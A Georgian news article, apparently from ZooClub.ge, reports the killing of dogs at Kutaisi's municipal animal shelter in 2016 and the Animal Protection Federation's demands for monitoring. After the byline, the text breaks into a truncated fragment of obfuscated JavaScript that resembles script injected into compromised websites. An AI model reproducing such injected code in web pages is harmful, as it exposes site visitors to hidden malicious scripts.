ქუთაისის მუნიციპალურ ცხოველთა თავშესაფარში ძაღლები დახოცეს (+ვიდეო)
ქუთაისის მუნიციპალურ ცხოველთა თავშესაფარში ძაღლები დახოცეს (+ვიდეო)
საქართველოს ცხოველთა დაცვის ფედერაციის ცნობით, ქუთაისის მერიის ა.ა.ი.პ. ,,სპეციალური სერვისების" ცხოველთა მუნიციპალურ თავშესაფარში ძაღლების დახოცვის ფაქტი დაფიქსირდა.

2016 წლის 8 თებერვალს ა.ა.ი.პ. საქართველოს ცხოველთა დაცვის ფედერაციას ანონიმურმა წყარომ მიაწოდა ორი ფოტო, რომლებზეც ასახულია ზემოაღნიშნული თავშესაფრის ტერიტორიაზე მყოფი გარდაცვლილი ძაღლები.
ფუნქცია Details-ის მეშვეობით გაირკვა, რომ სურათები 2016 წლის 8 თებერვალს დღის ხუთ საათსა და ათ წუთზეა გადაღებული, ხოლო პროგრამა Bluetooth-ის მეშვეობით მიღებულ იქნა ამავე დღის საღამოს, ათ საათსა და რვა წუთზე.

ფოტოების მიღების შემდეგ, ა.ა.ი.პ. საქართველოს ცხოველთა დაცვის ფედერაციის წარმომადგენლები მივიდნენ
ზემოაღნიშნულ თავშესაფარში და იქ დარჩენილი სისხლის კვალი იხილეს.

აღნიშნულთან დაკავშირებით ვიდეომასალაც გავრცელდა.

როგორც ცნობილია, აღნიშნული
ცხოველთა თავშესაფარი 2015 წლის სექტემბრიდან ფუნქციონირებს. 2016 წლის იანვრიდან დღემდე თავშესაფრის დირექტორის თანამდებობას თამაზ დეისაძე (ქალაქ ქუთაისის მერიის დასუფთავებისა და ნარჩენების მართვის სამსახურის ყოფილი უფროსი) იმყოფება.

Zooclub

როგორც ცხოველთა დაცვის ფედერაციის თავმჯდომარემ, თემურ ლაჭყებიანმა,

Zooclub.ge -განუცხადა, ფედერაცია თავშესაფრის მონიტორინგის უფლებას ითხოვს.

,,მოვითხოვთ, რომ დამჭერების მანქანაში ჩვენი წარმომადგენლისათვის ერთი ადგილი გამოინახოს და გვსურს, რომ ჩვენს წარმომადგენელს ოცდაოთხი საათის განმავლობაში შეეძლოს შესვლა თავშესაფარში და მონიტორინგის ჩატარება. გარდა ამისა, მოვითხოვთ, გააკეთონ მონაცემთა ბაზა მიღებული ცხოველების შესახებ, რათა ყველამ გაიგოს, რამდენი ძაღლია თავშესაფარში. არ აკეთებენ ამ ბაზას, ფოტოებს არ იღებენ, არსად არ ინიშნავენ, სად რამდენ ძაღლს იჭერენ და სრული განუკითხაობაა, აღრიცხვას საერთოდ არ აწარმოებენ," - აცხადებს თემურ ლაჭყებიანი.

მისი თქმით, თავშესაფრის ძაღლებს როგორც სურთ, ისე ექცევიან. მათ სანაგვეზე ყრიან და ფედერაცია, პირველ რიგში, ამ ქმედებათა შეჩერებას მოითხოვს. - ,, ეს არის ყველაზე მნიშვნელოვანი ამ ეტაპზე,"" - აცხადებს ცხოველთა დაცვის ფედერაციის თავმჯდომარე.
მისი თქმით, თავშესაფარში შესვლის ნებართვას მხოლოდ ჩხუბის შემდეგ ხდება შესაძლებელი. -,,გვინდა, რომ ჩხუბის გარეშეც, თავისუფლად შევიდეთ,"" - დასძენს ლაჭყებიანი.

იხილეთ ვიდეო

თეო ბითაძე სპეციალურად ZooClub.ge-სთვის // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e